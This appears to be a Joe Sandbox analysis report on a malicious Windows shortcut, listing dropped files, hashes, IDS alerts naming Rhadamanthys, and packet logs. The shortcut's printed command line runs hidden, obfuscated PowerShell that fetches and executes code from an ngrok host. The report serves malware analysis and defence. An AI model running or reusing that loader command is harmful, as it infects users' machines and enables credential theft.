                                                                                                                                                                                                                                                                                  Entropy (8bit):5.396220758526552
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:7nwyvB1qCo7mWUgsUopF5Xy4FlAwxdhvHcrdncqAKxwjBnKwIDQgrOChkPIgmrCp:wh6gstXy4FM5ncJKxCnKWgrd0v
                                                                                                                                                                                                                                                                                  MD5:E8015AC436B33034EDF7DA060E853A04
                                                                                                                                                                                                                                                                                  SHA1:62D0F6EB0E441158A1F56F6E0C70D3D229B57886
                                                                                                                                                                                                                                                                                  SHA-256:23C953E989FF4AF6126D4A3B2AD21B33A82512FC8768045C00F05940DE2C9978
                                                                                                                                                                                                                                                                                  SHA-512:C35AC8692FC22B78365CA202E173A90AE4B5DBA338B7FC9EEB17EDDF5868B52CF1D13DC0EDAF36BE1CC0E0152F41AC4027C51D7ECA27778B483E3FC83F11EA82
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function k(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty

                                                                                                                                                                                                                                                                                  C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exe

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\854113748.exe
                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):979567347
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.03081039114816888
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                                                                  MD5:3630E7B5DBB0E1C85EB706E03083DCCD
                                                                                                                                                                                                                                                                                  SHA1:359B68BAC271E72B8A1049B03EFF8F0D99001446
                                                                                                                                                                                                                                                                                  SHA-256:3A101A1B1DCDAB3321FA1157C86B3A418965F542051FF70AF24FA0B9B4CA9D85
                                                                                                                                                                                                                                                                                  SHA-512:8A86B5C5464F84701C4D069312F352E08822B7E397F09ECEA473E7EE1C5C88C98035B92E9977F9A5EE9C436E375876D6D8E5EA8AD47ED761602EAADF5E24AAA1
                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                                                  • Filename: qxjDerXRGR.lnk, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t...0..0..0......1......3......*....].3....^.=....H.%....O.?....X.'..0.......A......_.1....Z.1..Rich0..................PE..L......e.....................v.......4............@..........................P.......f....@..................................+..........$................S...p.........................................@...............p............................text............................... ..`.rdata..............................@..@.data....0...`.......H..............@....rsrc...$............d..............@..@........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\Downloads\8b913e2c-9850-431c-8d56-3f10af14d63d.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:PDF document, version 1.7, 2 pages
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):106848
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.916846950395155
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:/t7dsAjcYfnYKHqU4UDgCWuJhG/oEMKTKipqgdrP9sW32prNybV0MLQF2C/hy1T:lGY1YUPDgK6TlrPTsSVC/h8
                                                                                                                                                                                                                                                                                  MD5:14E5098503C76B02728CDE6EA96538C3
                                                                                                                                                                                                                                                                                  SHA1:88B84351C73D8E918BEA3DD7EB2178B9C466A342
                                                                                                                                                                                                                                                                                  SHA-256:7519554506D088A93C531F74F055E8966215CCC42C647382F6A95705172DCAFF
                                                                                                                                                                                                                                                                                  SHA-512:F8A88B3E86503F4422F599A279EBC8C9F3B552AC3F7495C92780FFE2B406FD1F2F855F0B47D1D0F543E058E90E7146A54ABF86B611FE4F071F46ECE6927D6087
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 25 0 R/MarkInfo<</Marked true>>/Metadata 85 0 R/ViewerPreferences 86 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 2/Kids[ 3 0 R 20 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 9 0 R/F3 11 0 R/F4 16 0 R>>/ExtGState<</GS7 7 0 R/GS8 8 0 R>>/XObject<</Image18 18 0 R/Image19 19 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 612 792] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 2726>>..stream..x..[Y..F.~.`.C.EZH4....0G.8k....Y`.....0.H..g'.~..I.C.Wk..G..&....l.7..`WWo...g..wI.`...~z.__...;.....|./..,..0..../~..+./n?^^...3..q~y.a..8S".4g..=.wV0..-jx![.......Fl.o......u...`?..cl. w.0../...T..pup..b....9...x.F.r<.......Q._.........%^...G.Y`1GR.....C)7.X...j..X..f.8.e2......4.Uy.C...c<...L@S.+..,&.01........#.....0...q...Pz.......G..#.......+.p..."..K8..B....

                                                                                                                                                                                                                                                                                  C:\Users\user\Downloads\Lewis Silkin LLP.pdf (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:PDF document, version 1.7, 2 pages
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):106848
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.916846950395155
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:/t7dsAjcYfnYKHqU4UDgCWuJhG/oEMKTKipqgdrP9sW32prNybV0MLQF2C/hy1T:lGY1YUPDgK6TlrPTsSVC/h8
                                                                                                                                                                                                                                                                                  MD5:14E5098503C76B02728CDE6EA96538C3
                                                                                                                                                                                                                                                                                  SHA1:88B84351C73D8E918BEA3DD7EB2178B9C466A342
                                                                                                                                                                                                                                                                                  SHA-256:7519554506D088A93C531F74F055E8966215CCC42C647382F6A95705172DCAFF
                                                                                                                                                                                                                                                                                  SHA-512:F8A88B3E86503F4422F599A279EBC8C9F3B552AC3F7495C92780FFE2B406FD1F2F855F0B47D1D0F543E058E90E7146A54ABF86B611FE4F071F46ECE6927D6087
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 25 0 R/MarkInfo<</Marked true>>/Metadata 85 0 R/ViewerPreferences 86 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 2/Kids[ 3 0 R 20 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 9 0 R/F3 11 0 R/F4 16 0 R>>/ExtGState<</GS7 7 0 R/GS8 8 0 R>>/XObject<</Image18 18 0 R/Image19 19 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 612 792] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 2726>>..stream..x..[Y..F.~.`.C.EZH4....0G.8k....Y`.....0.H..g'.~..I.C.Wk..G..&....l.7..`WWo...g..wI.`...~z.__...;.....|./..,..0..../~..+./n?^^...3..q~y.a..8S".4g..=.wV0..-jx![.......Fl.o......u...`?..cl. w.0../...T..pup..b....9...x.F.r<.......Q._.........%^...G.Y`1GR.....C)7.X...j..X..f.8.e2......4.Uy.C...c<...L@S.+..,&.01........#.....0...q...Pz.......G..#.......+.p..."..K8..B....

                                                                                                                                                                                                                                                                                  C:\Users\user\Downloads\Unconfirmed 332663.crdownload (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:PDF document, version 1.7, 2 pages
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):106848
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.916846950395155
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:/t7dsAjcYfnYKHqU4UDgCWuJhG/oEMKTKipqgdrP9sW32prNybV0MLQF2C/hy1T:lGY1YUPDgK6TlrPTsSVC/h8
                                                                                                                                                                                                                                                                                  MD5:14E5098503C76B02728CDE6EA96538C3
                                                                                                                                                                                                                                                                                  SHA1:88B84351C73D8E918BEA3DD7EB2178B9C466A342
                                                                                                                                                                                                                                                                                  SHA-256:7519554506D088A93C531F74F055E8966215CCC42C647382F6A95705172DCAFF
                                                                                                                                                                                                                                                                                  SHA-512:F8A88B3E86503F4422F599A279EBC8C9F3B552AC3F7495C92780FFE2B406FD1F2F855F0B47D1D0F543E058E90E7146A54ABF86B611FE4F071F46ECE6927D6087
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 25 0 R/MarkInfo<</Marked true>>/Metadata 85 0 R/ViewerPreferences 86 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 2/Kids[ 3 0 R 20 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 9 0 R/F3 11 0 R/F4 16 0 R>>/ExtGState<</GS7 7 0 R/GS8 8 0 R>>/XObject<</Image18 18 0 R/Image19 19 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 612 792] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 2726>>..stream..x..[Y..F.~.`.C.EZH4....0G.8k....Y`.....0.H..g'.~..I.C.Wk..G..&....l.7..`WWo...g..wI.`...~z.__...;.....|./..,..0..../~..+./n?^^...3..q~y.a..8S".4g..=.wV0..-jx![.......Fl.o......u...`?..cl. w.0../...T..pup..b....9...x.F.r<.......Q._.........%^...G.Y`1GR.....C)7.X...j..X..f.8.e2......4.Uy.C...c<...L@S.+..,&.01........#.....0...q...Pz.......G..#.......+.p..."..K8..B....

                                                                                                                                                                                                                                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):55
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                                                                                                                  C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1835008
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.466410836397351
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6144:3IXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uNCdwBCswSbt:4XD94zWlLZMM6YFHY+t
                                                                                                                                                                                                                                                                                  MD5:365B0526EE3229CCC354707F81C64C99
                                                                                                                                                                                                                                                                                  SHA1:5EEAFFB13B3AEBBE1205072D8B9916A448664F34
                                                                                                                                                                                                                                                                                  SHA-256:57D8A385862EDD64349F17E972073D06090CA690C4D2C56E096732F5F085391F
                                                                                                                                                                                                                                                                                  SHA-512:8A36D6FCB9BFC2D66B2F7EF1E5B29650F66E33308EBA9725C85CFEDA02154177EDA90474290764662DC9B8216438080E875FD434EEDDE4D0FF2FAD3F3419FABA
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm2...*K...............................................................................................................................................................................................................................................................................................................................................~..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=11, Archive, ctime=Thu Nov 28 22:32:21 2024, mtime=Sun Dec 1 16:36:54 2024, atime=Thu Nov 28 22:32:21 2024, length=289792, window=hide
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7275153806203236
                                                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                                                  • Windows Shortcut (20020/1) 100.00%
                                                                                                                                                                                                                                                                                  File name:751ietQPnX.lnk
                                                                                                                                                                                                                                                                                  File size:2'614 bytes
                                                                                                                                                                                                                                                                                  MD5:80088bacc66572cd6744243cf62be2ba
                                                                                                                                                                                                                                                                                  SHA1:595caf1d649749b0da44866cd5c13afaf21f5626
                                                                                                                                                                                                                                                                                  SHA256:da4b8840562135313b4af52637a248fbab262a37fb041e12a9b93e5cda32ae2f
                                                                                                                                                                                                                                                                                  SHA512:7c5769b7d343bd3da91e8760d3c7ce44678880aab6d06a3519f5623c851e0cfe68b8306c6342099966368ca5e23d4d8a37e2984f8053d5df2cb298c43ad36739
                                                                                                                                                                                                                                                                                  SSDEEP:48:8GIgax4PsU/uHBCLOrFhGd0lL4XuH4Xv3SsgoQYk:8fgaxEs2uHYOxhdl2uWvZg5Y
                                                                                                                                                                                                                                                                                  TLSH:9351D1252ED41724E3F34D358977A2518E7AF9866C324F1E404045880C62F15DC76F2B
                                                                                                                                                                                                                                                                                  File Content Preview:L..................F.@.. ....Q...A.......D.......A...l......................5....P.O. .:i.....+00.../C:\...................V.1......Y'...Windows.@........OwH.Y(...........................-...W.i.n.d.o.w.s.....Z.1......Y)...System32..B........OwH.YI.......

                                                                                                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                                                                                                  Icon Hash:929e9e96a3f3d6ed

                                                                                                                                                                                                                                                                                  Static Windows Shortcut Info

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Relative Path:..\..\..\..\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                  Command Line Argument:/c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing)
                                                                                                                                                                                                                                                                                  Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                                                                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                                                                                                  Suricata IDS Alerts

                                                                                                                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                  2024-12-10T18:41:30.742148+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449735162.125.69.18443TCP
                                                                                                                                                                                                                                                                                  2024-12-10T18:41:45.354267+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449790162.125.69.18443TCP
                                                                                                                                                                                                                                                                                  2024-12-10T18:42:17.083476+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert1162.213.210.2506499192.168.2.449834TCP

                                                                                                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:13.384290934 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:16.659912109 CET49731443192.168.2.418.192.31.165
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:16.659953117 CET4434973118.192.31.165192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:16.660331011 CET49731443192.168.2.418.192.31.165
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:16.718313932 CET49731443192.168.2.418.192.31.165
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:16.718331099 CET4434973118.192.31.165192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:18.109651089 CET4434973118.192.31.165192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:18.109807968 CET49731443192.168.2.418.192.31.165
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:18.114644051 CET49731443192.168.2.418.192.31.165
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:18.114653111 CET4434973118.192.31.165192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:18.114974976 CET4434973118.192.31.165192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:18.125844002 CET49731443192.168.2.418.192.31.165
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:18.167329073 CET4434973118.192.31.165192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:20.305227995 CET4434973118.192.31.165192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:20.305656910 CET4434973118.192.31.165192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:20.305773020 CET49731443192.168.2.418.192.31.165
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:20.309145927 CET49731443192.168.2.418.192.31.165
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:20.475133896 CET49732443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:20.475167990 CET44349732162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:20.475263119 CET49732443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:20.475701094 CET49732443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:20.475713968 CET44349732162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:21.310062885 CET44349730173.222.162.32192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:21.310174942 CET49730443192.168.2.4173.222.162.32
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:21.898475885 CET44349732162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:21.898682117 CET49732443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:21.902760029 CET49732443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:21.902772903 CET44349732162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:21.903043985 CET44349732162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:21.904273033 CET49732443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:21.947335005 CET44349732162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:23.093736887 CET44349732162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:23.093807936 CET44349732162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:23.093877077 CET49732443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:23.093969107 CET49732443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:23.097937107 CET49732443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:23.433985949 CET49733443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:23.434051037 CET44349733162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:23.434139013 CET49733443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:23.434521914 CET49733443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:23.434545040 CET44349733162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:24.911057949 CET44349733162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:24.911258936 CET49733443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:24.911303997 CET44349733162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:24.911387920 CET49733443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:24.914815903 CET49733443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:24.914825916 CET44349733162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:24.915093899 CET44349733162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:24.917001009 CET49733443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:24.963345051 CET44349733162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:25.762674093 CET44349733162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:25.763804913 CET44349733162.125.69.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:25.763854980 CET49733443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:25.769920111 CET49733443192.168.2.4162.125.69.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:27.992747068 CET49735443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:27.992791891 CET44349735162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:27.992872953 CET49735443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:27.993519068 CET49735443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:27.993535042 CET44349735162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:28.151700020 CET804972384.201.209.100192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:28.151902914 CET4972380192.168.2.484.201.209.100
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:28.161956072 CET4972380192.168.2.484.201.209.100
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:28.284096003 CET804972384.201.209.100192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:29.528845072 CET44349735162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:29.568792105 CET49735443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:29.568814039 CET44349735162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:30.742177010 CET44349735162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:30.742252111 CET44349735162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:30.742300987 CET49735443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:30.742328882 CET49735443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:30.758291960 CET49735443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:31.605274916 CET49736443192.168.2.4162.125.65.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:31.605336905 CET44349736162.125.65.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:31.605454922 CET49736443192.168.2.4162.125.65.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:31.612195015 CET49736443192.168.2.4162.125.65.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:31.612216949 CET44349736162.125.65.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:32.930221081 CET49737443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:32.930257082 CET44349737162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:32.930322886 CET49737443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:32.975518942 CET44349736162.125.65.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:32.975626945 CET49736443192.168.2.4162.125.65.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:32.975658894 CET44349736162.125.65.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:32.975703955 CET49736443192.168.2.4162.125.65.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:32.994508982 CET49736443192.168.2.4162.125.65.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:32.994524002 CET44349736162.125.65.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:32.994889021 CET44349736162.125.65.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:33.003652096 CET49736443192.168.2.4162.125.65.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:33.047341108 CET44349736162.125.65.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:33.052064896 CET49737443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:33.052102089 CET44349737162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:33.699935913 CET44349736162.125.65.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:33.700438023 CET44349736162.125.65.15192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:33.700509071 CET49736443192.168.2.4162.125.65.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:33.906152010 CET49736443192.168.2.4162.125.65.15
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:34.486572981 CET44349737162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:34.487107038 CET49737443192.168.2.4162.125.69.18
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:34.487139940 CET44349737162.125.69.18192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 10, 2024 18:41:34.488532066 CET44349737162.125.69.18192.168.2.4
